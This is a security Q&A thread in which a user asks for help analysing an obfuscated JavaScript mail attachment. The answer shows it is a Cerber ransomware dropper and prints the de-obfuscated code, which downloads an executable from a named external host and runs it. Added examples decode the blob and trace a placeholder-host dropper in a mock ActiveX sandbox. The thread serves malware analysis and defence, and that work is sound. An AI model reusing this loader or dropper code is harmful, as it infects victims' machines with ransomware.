
Two days ago, I received a suspicious email.

The sender was a mailing list that I am a member of, but it originated from a web host's subdomain (applegate.dreamhost.com). The content was roughly related to an earlier discussion on that mailing list (see content below).

The mail contained a link to a .zip file with my full name in it, named like a .doc document but with a .js file extension.

Usually I just ignore such mails, but what made me suspicious was the fact that the email was related to an earlier discussion and contained my full name, which is neither registered to that account nor did I ever use it in any mail on that list.

So I decided to have a look at it and downloaded the zip.

Now I have an obfuscated JavaScript file and I don't know how to go on from here.

The script consists of a huge unreadable alphanumeric string and a lot of string operations that seem to get the original content from that alphanumeric string. (see script below)

Mail Text:

"Re: [<list name obfuscated>] Kaffee"
<br>
<br>
<a href=3D"http://soldbychuck.com/<full path obfuscated>"><name obfuscated></a>

JavaScript:

function ddtcz()
{
    var qglpa=/* first block of the hex string not preserved on this page */""+
    "be74af0867a856cc2571fc624e4f28bee6eb5169c6164eb47bbf46ddad21ac533b4675dd26dec564f157bf506df0f73e807aaa86db437ca5f7dc027af3e66f2b28adb6bc0e69e6064e4164c5a6ae9f69a036beec63aae20e7166f9f7dcf864cdd64eb124a3528f1c7cd277af167dd1e6dd1721dbf33c3c75e0a75f066bf0869a697cfe06bbba60d6b28ddb20e786dfda7adc47ab8c67d567aa5b21d2a73b667affb6dd797cb5e7df2d7acb066de228b966bf0a69c3c64a5264c2e6aaa769dfa6bdac63c1920a0866af17dc0064aeb64e1e24a7228e9c7cc3a7aac57de456dc5d21f7c33ef675c1675ae76eaec7dbe666e586bd647ce3861b9b67a7366e4228b026fdb26dec17cf1e4cae569d007cf9c69bb620acb6baaf69bd964c7564c726ac3269c426bfca63b0321adf73cda7cb157aa4371f0073eee6fa836daf77cb034cefc69a207ce9869dc84eefb7aaa567d0565dac5dfca7aae464bd320ad42afcc60a607cd597cc5378ffb32e8727f3327c527fd0e7ff0c7fa5026e7e6fc246de887aa2769e2d64bd16cc466fddf67ca87abbc6de9426f156baeb67d2d65eef27f4b66f0e6da2c7fa977bdc327bab39c8b3ff8a26c1b6dbfb70bbf6de982aea024fa228a3f6eb897deee66fb86bc487ca9761fc267fba66ba520f7f7ae926dfd97bcd87dc9464fd77cbee24fbb28e776dc027af687a"+
    /* three further blocks of the hex string not preserved on this page */""+
"bd821a7e28ded23cd928aeb7caed65a1478bed4eb8761c8c64da06debe46e6f69fbc65ccb6daca33eea7aa3a6de637cbca7da557ad5e66d4628d127cb6f65a6b78f4a4ec5c61a3264a8f6df9458a3869acb7cc7b60cb133cb775a706bfbf69cb17cdf96bcb160dc428ad120f476dcb27ad2d7ae4467dfe7ac6b21df073a657aae26dc1f7ccd37df6f7aef166fd428e726eed869d7664b7a7bd906ddda33d4975f1d75deb6edb97deae66e0d6bc447cf8a61c1367aa166f4528bf67ba9569e417ec2a6dc155cb8967c5e5cac16dada65b0d78cdc20fe66cac969a4a7cf9b69ab424d2828d346bd5269b8a64af964ea86abb569fc86bc9163a9c21c2f73f017ca357aa6c71f7b73b567ef9269a6f7acc728dff78b4169b1a7cb2c60c4328b1035e6f28c276fc2b6db097cf275cd706dd0a65bcc78a514eb9261f9764fd96da5058e0469c567cfeb60c0620af221ee733e4e61e186ecb628ed020db478f2969ad87cf5260a6121b3173d247ed2569a817ac7f28ee067bab6afb062b9d5bba37cbf67ab976dd2969f3165f8728f8635ba128a6c66d066dcde7fd3f28e7749be96bfba7cf9361b5a7ed056dd0a50c3447f026af3462d1a6da606bd367cbef20c332aebb49b654ceb847b714cb244aca426aa95bf4b7ce7a7aecd6dac069f2f65a1a2ac4121d8333ffc67e186adba62bb25be0d7cf0a7a"+
    /* two further blocks of the hex string not preserved on this page */""+
"c9e20d946dcbc7ac2b7ab8167fcb7aa4321f0628dcc73faf75a3775ede75b5a21e0c33fd575fb175cc521d9d33";
    var jlusw;
    while(true){
    try
    {
        jlusw=(new Function("rrxoc","var ujfnb=rrxoc"+wutob()+"/\\S{5}/g),amdeo=\"\",vrhqs"+wutob()+"ile(vrhqs<ujfnb"+wutob()+"gth){amdeo+"+wutob()+"e"+wutob()+"ujfnb[vrhqs].substr(3,2),16)^8);vrhqs++;}eval(amdeo);")(qglpa));
        break;
    }
    catch(er)
    {
    }
}
    return jlusw;
}
function wutob()
{
    var nnyfm=new Array("_3da","_gda","=String.fromCharCod","(parseInt(",".match(","=0;wh",".len","_aas","-_ad");
    return nnyfm[Math.floor(Math.random()*nnyfm.length)];
}
ddtcz();

Can anyone help me find out what this script is doing, or does anyone have an idea how an attacker could get this private data?

Would you think this is a targeted attack or just part of an automated attack?

No one else on the list received a similar mail. The mail account is from google and the mailing list is a googlegroup.

Jedi
Malcolm X
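Added example, not code from the original question or answer: a Node.js script that recovers the payload hidden by ddtcz() and wutob() in the script above. The nine fragments and the loader template are copied verbatim from the question; the sample input is the first 235 characters of the hex string that is still visible in the question (47 chunks of 5 characters), which is the page's own data, not the full blob. decodeChunks() reimplements the loader statically, so nothing from the sample is executed. captureViaSink() runs the loader text itself with its eval replaced by a callback (the "change eval to console.log" trick, but capturing the string). findWorkingLoader() replaces the script's while(true)/try loop with a deterministic search over all 9^5 fragment combinations, which settles which fragment belongs in which slot without guessing. The function names and the length check are my additions.

```javascript
// Added example (not code from the original post): recover the payload hidden
// by ddtcz()/wutob() in the question, without ever executing that payload.

// The nine fragments from wutob(), verbatim from the question.
const FRAGMENTS = ["_3da", "_gda", "=String.fromCharCod", "(parseInt(",
                   ".match(", "=0;wh", ".len", "_aas", "-_ad"];

// The combination that produces working loader code:
// .match( / =0;wh / .len / =String.fromCharCod / (parseInt(
const CANONICAL_PICK = [4, 5, 6, 2, 3];

// Constructed test input: the first 235 characters of the hex string that is
// still visible in the question (47 chunks of 5 characters).
const SAMPLE_BLOB =
  "be74af0867a856cc2571fc624e4f28bee6eb5169c6164eb47bbf46ddad21ac533" +
  "b4675dd26dec564f157bf506df0f73" +
  "e807aaa86db437ca5f7dc027af3e66f2b28adb6bc0e69e6064e4164c5a6ae9f69" +
  "a036beec63aae20e7166f9f7dcf864cdd64eb124a3528f1c7cd277af167dd1e6dd1721dbf33";

// Rebuild the source string that ddtcz() hands to new Function() for one
// choice of fragment per slot (pick holds five indices into FRAGMENTS).
function buildLoaderSource(pick) {
  const f = pick.map((i) => FRAGMENTS[i]);
  return "var ujfnb=rrxoc" + f[0] + "/\\S{5}/g),amdeo=\"\",vrhqs" + f[1] +
    "ile(vrhqs<ujfnb" + f[2] + "gth){amdeo+" + f[3] + "e" + f[4] +
    "ujfnb[vrhqs].substr(3,2),16)^8);vrhqs++;}eval(amdeo);";
}

// Static decoder: what the working loader does, reimplemented so that no
// attacker code runs. Each 5-character chunk carries one byte in positions
// 3-4 (hex); the other three characters are filler. The byte is XORed with 8.
function decodeChunks(blob, key = 8) {
  // The original silently drops a short trailing chunk; for analysis a
  // misaligned blob is a bug worth surfacing (my addition).
  if (blob.length % 5 !== 0) {
    throw new Error("blob length " + blob.length + " is not a multiple of 5");
  }
  let out = "";
  for (const chunk of blob.match(/\S{5}/g) || []) {
    const byte = parseInt(chunk.substr(3, 2), 16);
    if (Number.isNaN(byte)) throw new Error("non-hex chunk: " + chunk);
    out += String.fromCharCode(byte ^ key);
  }
  return out;
}

// Sink capture: run the loader text itself, but with its eval() replaced by a
// callback that stores the decoded string. Returns null if the sink is never hit.
function captureViaSink(loaderSource, blob) {
  if (!loaderSource.includes("eval(amdeo)")) throw new Error("eval sink not found");
  const patched = loaderSource.replace("eval(amdeo)", "__sink(amdeo)");
  let captured = null;
  new Function("rrxoc", "__sink", patched)(blob, (s) => { captured = s; });
  return captured;
}

// Deterministic stand-in for the script's while(true)/try loop: enumerate all
// 9^5 fragment choices and return the first one that both parses and reaches
// the sink. Most choices die with a SyntaxError, a few parse but hit a
// ReferenceError on a nonsense identifier; only one decodes.
function findWorkingLoader(blob) {
  const n = FRAGMENTS.length;
  const pick = [0, 0, 0, 0, 0];
  for (let k = 0; k < n ** 5; k++) {
    let r = k;
    for (let s = 4; s >= 0; s--) { pick[s] = r % n; r = Math.floor(r / n); }
    const source = buildLoaderSource(pick);
    try {
      const decoded = captureViaSink(source, blob);
      if (decoded !== null) return { pick: pick.slice(), source, decoded };
    } catch (e) {
      // expected for wrong combinations; try the next one
    }
  }
  return null;
}

console.log(decodeChunks(SAMPLE_BLOB));
```

The sample decodes to `Body, false);}else{return callback(null, true);`, which is the tail of the getDataFromUrl function shown in the answer below (the answer's listing is pretty-printed; the decoded text has no whitespace around the braces). The static decoder is the one to prefer: it needs no interpreter, and a blob whose length is not a multiple of 5 is rejected instead of producing misaligned garbage, which is what happens if you feed it a truncated string.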

1 Answer


This script attempts to infect your Windows computer with the Cerber ransomware.

The obfuscated JavaScript segment downloads an executable from http://www.geraldgore.com/news/17.exe to a temporary file and runs it, employing Internet Explorer's ActiveX controls.

The VirusTotal analysis of that binary suggests that it's a variant of the Cerber ransomware.

This is the de-obfuscated payload:

// Fetch url synchronously through the MSXML2.XMLHTTP COM object and pass the
// raw bytes (ResponseBody, not the decoded ResponseText) to callback.
function getDataFromUrl(url, callback) {
    try {
        var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
        xmlHttp.open("GET", url, false); // third argument false: synchronous request
        xmlHttp.send();
        if (xmlHttp.status == 200) {
            return callback(xmlHttp.ResponseBody, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}

// Up to three download attempts of the same URL, unrolled instead of looped.
function getData(callback) {
    try {
        getDataFromUrl("http://www.geraldgore.com/news/17.exe", function(result, error) {
            if (!error) {
                return callback(result, false);
            } else {
                getDataFromUrl("http://www.geraldgore.com/news/17.exe", function(result, error) {
                    if (!error) {
                        return callback(result, false);
                    } else {
                        getDataFromUrl("http://www.geraldgore.com/news/17.exe", function(result, error) {
                            if (!error) {
                                return callback(result, false);
                            } else {
                                return callback(null, true);
                            }
                        });
                    }
                });
            }
        });
    } catch (error) {
        return callback(null, true);
    }
}

// Build a random 9-character .exe name inside %TEMP%; GetSpecialFolder(2) is
// the TemporaryFolder constant of Scripting.FileSystemObject.
function getTempFilePath() {
    try {
        var fs = new ActiveXObject("Scripting.FileSystemObject");
        var tmpFileName = "\\" + Math.random().toString(36).substr(2, 9) + ".exe";
        var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
        return tmpFilePath;
    } catch (error) {
        return false;
    }
}

// Write the downloaded bytes to that path through ADODB.Stream:
// Type = 1 is adTypeBinary, SaveToFile(path, 2) is adSaveCreateOverWrite.
function saveToTemp(data, callback) {
    try {
        var path = getTempFilePath();
        if (path) {
            var objStream = new ActiveXObject("ADODB.Stream");
            objStream.Open();
            objStream.Type = 1;
            objStream.Write(data);
            objStream.Position = 0;
            objStream.SaveToFile(path, 2);
            objStream.Close();
            return callback(path, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}

// Entry point: download, drop into %TEMP%, then execute via WScript.Shell.Run.
getData(function(data, error) {
    if (!error) {
        saveToTemp(data, function(path, error) {
            if (!error) {
                try {
                    var wsh = new ActiveXObject("WScript.Shell");
                    wsh.Run(path);
                } catch (error) {}
            }
        });
    }
});
Arminius
  • How would one deobfuscate something similar in the future? – mlhDev Jan 09 '17 at 03:14
  • @Matthew You can often find a sink where - just before execution - the payload gets de-obfuscated. In this case there is the `eval(amdeo);` function inside that while loop which takes the entire payload as a string. You can just change `eval` to `console.log` to get the plain payload back. This way you don't have to fight with the obfuscation algorithm. For other obfuscation schemes, the approach would be different, though. – Arminius Jan 09 '17 at 03:34
  • Thanks for your answer. With your information I found out that this payload was used to attack multiple people on the same day, so the attack probably wasn't targeted at me. I might post a new question tomorrow to find out possible ways my personal data could have leaked. @Matthew From your interest I guess you received a similar mail; would you like to share details? – Malcolm X Jan 09 '17 at 05:22
  • Aside: I always replace `eval` with `prompt(1,`, which lets you copy the code from the popup textbox. Nice of the attackers to use semantic var names, aren't they even trying anymore? – dandavis Jan 09 '17 at 14:38
  • @dandavis Semantic names? AFAICS all variables had obfuscated names. – Arminius Jan 09 '17 at 17:06
  • @Arminius: no, those are the same names in the OP's script (I decoded it too). The code was obfuscated, it should have also been uglified or _closure_'d to reduce space and remove meaningful names that tattle on the functionality. They are mostly amateur library JS functions, the kind people copy from w3fools... – dandavis Jan 09 '17 at 22:13
  • @dandavis Ah, so you were referring to the payload, which was not additionally obfuscated, true. – Arminius Jan 09 '17 at 22:31
  • @Matthew There are tools you can use that will run malicious JS code in a sandbox environment and tell you everything it did. For example, Box-JS is a node.js based tool which wraps many common ActiveX features JScript malware tends to use and reports what the script did: https://github.com/CapacitorSet/box-js. I previously wrote a rudimentary webpage that does the same thing and reports the same information, but runs in-browser so I can debug scripts using Chrome DevTools: https://gist.github.com/jocopa3/092219dd8b3c57f7ebbf9eacdd28aa44 – jocopa3 Mar 01 '17 at 23:15
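Added example, not part of the answer and not box-js code: a minimal ActiveX emulation for Node.js in the spirit of the sandboxing approach jocopa3 describes. It exposes fake versions of the four ProgIDs the de-obfuscated payload above uses, with only the members that payload touches, and records every call instead of performing it, so the trace yields the download URL, the dropped path and the executed command without network or disk activity. The COM constants in the comments (GetSpecialFolder(2) = TemporaryFolder, ADODB.Stream Type 1 = adTypeBinary, SaveToFile option 2 = adSaveCreateOverWrite) are the real ones; the fake temp folder, the placeholder URL dropper.example and the condensed dropper script are constructed test input, and the function names are mine.

```javascript
// Added example (not from the original post, not box-js): record what a
// JScript dropper asks the ActiveX objects to do, instead of doing it.

function makeSandbox() {
  const log = [];
  const record = (what, detail) => log.push(Object.assign({ what }, detail));
  const FAKE_TEMP = "C:\\Users\\victim\\AppData\\Local\\Temp"; // constructed path

  // One factory per ProgID the answer's payload instantiates.
  const factories = {
    "MSXML2.XMLHTTP": () => {
      const req = { status: 0, ResponseBody: null, _url: null };
      req.open = (method, url, async) => {
        req._url = url;
        record("http.open", { method, url, async });
      };
      req.send = () => {
        // Pretend the download succeeded and hand back constructed bytes.
        record("http.send", { url: req._url });
        req.status = 200;
        req.ResponseBody = new TextEncoder().encode("MZ fake body for " + req._url);
      };
      return req;
    },
    "Scripting.FileSystemObject": () => ({
      // In the real object index 2 is TemporaryFolder.
      GetSpecialFolder: (index) => {
        record("fs.GetSpecialFolder", { index });
        return index === 2 ? FAKE_TEMP : "C:\\Windows";
      },
    }),
    "ADODB.Stream": () => {
      const stream = { Type: 0, Position: 0, _data: null };
      stream.Open = () => record("stream.Open", {});
      stream.Write = (data) => {
        stream._data = data;
        record("stream.Write", { bytes: data ? data.length : 0 });
      };
      // Type 1 = adTypeBinary, option 2 = adSaveCreateOverWrite on the real object.
      stream.SaveToFile = (path, option) =>
        record("stream.SaveToFile", { path, option, type: stream.Type,
                                      bytes: stream._data ? stream._data.length : 0 });
      stream.Close = () => record("stream.Close", {});
      return stream;
    },
    "WScript.Shell": () => ({
      Run: (command, windowStyle, waitOnReturn) => {
        record("shell.Run", { command, windowStyle, waitOnReturn });
        return 0;
      },
    }),
  };

  function ActiveXObject(progId) {
    const make = factories[progId];
    record("ActiveXObject", { progId, emulated: Boolean(make) });
    // An unknown ProgID throws, like a failed COM instantiation; the dropper's
    // own try/catch then takes its error path, which is itself worth seeing.
    if (!make) throw new Error("no emulation for ProgID " + progId);
    return make();
  }
  return { ActiveXObject, log };
}

// Run one script with the fake COM layer passed in as parameters. This is a
// tracing aid for code you have already de-obfuscated and read, not a security
// boundary: Function() shares the host's globals. Use a throwaway VM for
// samples you have not read.
function runInSandbox(scriptSource) {
  const sandbox = makeSandbox();
  new Function("ActiveXObject", "WScript", scriptSource)(sandbox.ActiveXObject, { Quit() {} });
  return sandbox.log;
}

// Pull the indicators an analyst wants out of the trace.
function extractIocs(log) {
  const pick = (what, field) => log.filter((e) => e.what === what).map((e) => e[field]);
  return {
    progIds: [...new Set(pick("ActiveXObject", "progId"))],
    urls: [...new Set(pick("http.open", "url"))],
    droppedFiles: pick("stream.SaveToFile", "path"),
    executed: pick("shell.Run", "command"),
  };
}

// Constructed sample: the same download / drop / run chain as the de-obfuscated
// payload in the answer, condensed, with a placeholder URL instead of the real one.
const SAMPLE_DROPPER = `
var url = "http://dropper.example/news/17.exe";
var x = new ActiveXObject("MSXML2.XMLHTTP");
x.open("GET", url, false);
x.send();
if (x.status == 200) {
  var fs = new ActiveXObject("Scripting.FileSystemObject");
  var path = fs.GetSpecialFolder(2) + "\\\\" + Math.random().toString(36).substr(2, 9) + ".exe";
  var st = new ActiveXObject("ADODB.Stream");
  st.Open(); st.Type = 1; st.Write(x.ResponseBody); st.Position = 0;
  st.SaveToFile(path, 2); st.Close();
  new ActiveXObject("WScript.Shell").Run(path);
}`;

console.log(JSON.stringify(extractIocs(runInSandbox(SAMPLE_DROPPER)), null, 2));
```

The point of faking the objects rather than stubbing ActiveXObject to a no-op is that the dropper's control flow depends on their return values: without status 200 and a truthy temp path, the script takes its silent error branches and you never see the Run call. The trace also makes the error paths visible, since an unemulated ProgID shows up as a failed instantiation rather than disappearing into the dropper's empty catch blocks.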